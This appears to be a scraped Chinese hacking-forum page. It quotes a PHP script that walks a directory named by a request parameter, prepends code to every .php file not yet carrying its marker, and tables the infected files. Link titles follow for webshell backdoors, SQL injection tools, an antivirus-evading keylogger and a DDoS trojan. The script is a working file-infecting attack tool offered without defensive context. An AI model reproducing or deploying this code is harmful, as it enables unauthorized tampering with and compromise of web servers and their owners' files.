| 以下是引用片段: <?//xy7 if (!isset($dir) or empty($dir)) { $dir=str_replace('\\','/',dirname(__FILE__)); echo "<font color=\"#00688B\">".$dir."</font>"; } else { $dir=$_GET['dir']; echo "<font color=\"#00688B\">".$dir."</font>"; } $evilcode="<?phpinfo();//xy7?>"; $testdir = opendir($dir); while($filea = @readdir($testdir)){ if(strstr($filea, '.php')){ $fp = @fopen($filea, 'r+'); if (!strstr(@fread($fp, 20), 'xy7')){ rewind($fp); $old = @fread($fp, filesize($filea)); rewind($fp); fwrite($fp, $evilcode . $old); } fclose($fp); } } closedir($testdir); ?> <hr> <table width="100%" border="0" cellpadding="3" cellspacing="1"> <tr> <td><b>被X的文件</b></td> <td><b>时间</b></td> <td><b>大小</b></td> </tr> <?php $dirs=@opendir($dir); while ($file=@readdir($dirs)) { if ((is_file($file)) and (ereg("\.php{0,1}$",$file))) {$b="$dir/$file"; $a=@is_dir($b); if($a=="0"){ $size=@filesize("$dir/$file"); $lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file")); echo "<tr>\n"; echo "<td>$file</td>\n"; echo " <td>$lastsave</td>\n"; echo " <td>$size Bytes</td>\n"; } } } @closedir($dirs); ?> </table> |
| 入侵工具Knark的分析及防范 | 01-14 | |
| 十三WEBSHELL终结版后门的去除过 | 12-14 | |
| hijack(红狼安全小组原创作品 - | 11-29 | |
| 高级内网渗透工具:Paris (创建VP | 11-01 | |
| ASP+MSSQL注入工具 web版 beta 3 | 10-05 | |
| MSSQL cookie注入工具[web版] | 09-27 | |
| 最酷的windows后门 | 09-10 | |
| Radmin 3.0 Remote Control 英文 | 08-17 | |
| X-Spoof使用详解+工具 | 08-17 | |
| ASPX傀儡木乃伊(ASPX SYN DDOS) | 08-14 | |
| 黑界神兵-cain | 08-06 | |
| 一个穿透卡巴的傻x智能键盘记录器 | 08-03 | |